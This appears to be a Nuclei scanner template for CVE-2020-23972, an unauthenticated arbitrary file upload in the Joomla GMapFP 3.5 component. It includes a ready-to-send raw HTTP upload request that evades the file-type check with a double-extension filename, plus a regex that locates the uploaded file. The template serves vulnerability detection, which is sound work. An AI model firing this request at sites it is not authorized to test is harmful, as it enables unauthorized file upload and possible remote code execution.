id: CVE-2020-23972 info: name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload author: dwisiswant0 severity: high description: | Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext. impact: | Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website. remediation: | Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49129 - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html - https://nvd.nist.gov/vuln/detail/CVE-2020-23972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 epss-score: 0.61117 epss-percentile: 0.97491 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 vendor: gmapfp product: gmapfp framework: joomla\! tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\! variables: name: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} Connection: close ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="option" com_gmapfp ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif" Content-Type: text/html projectdiscovery ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="no_html" no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- payloads: component: - "com_gmapfp" - "comgmapfp" extractors: - type: regex regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" part: body # digest: 4a0a004730450220751c057dc4fe87146c6f320ed59aaec6426d3188de7ccb0fdd6e2e84e8be4944022100c674bf97e6367563e03827d1b0fe51fece2d94879cc6ed4409eb0b42cd713b4e:922c64590222798bb761d5b6d8e72950